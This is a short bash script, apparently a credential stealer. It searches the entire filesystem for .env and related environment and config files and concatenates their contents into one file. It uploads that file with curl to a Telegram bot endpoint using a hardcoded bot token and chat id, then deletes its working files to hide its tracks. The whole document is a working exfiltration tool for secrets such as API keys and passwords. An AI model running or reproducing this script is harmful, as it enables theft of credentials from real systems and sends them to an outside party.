#!/bin/bash 

#wong_galek

asu=$(find / -name *.env -o -name *.env.bak -o -name *config.env -o -name *.env.dist -o -name *.env.dev -o -name *.env.local -o -name *.env.backup -o -name *.environment -o -name *.envrc -o -name *.envs -o -name *.env~ | grep -v 'Permission denied' > filene.txt; sed 's/^/cat /;' filene.txt > gass.sh; chmod +x gass.sh; > /dev/null)

asuu=$(bash gass.sh > bruhh.txt)

path=$(find / -name bruhh.txt | grep -v 'Permission denied')

curl -s -F document=@$path https://api.telegram.org/bot5943773362:AAGfuKHmDMfzVOt9yUz2p-eD1sCTc1iYYoU/sendDocument?chat_id=5135860690 | sed 's/\r//g' > /dev/null

echo "[+] DONE BRO [+]"

rm -rf filene.txt gass.sh bruhh.txt a.sh
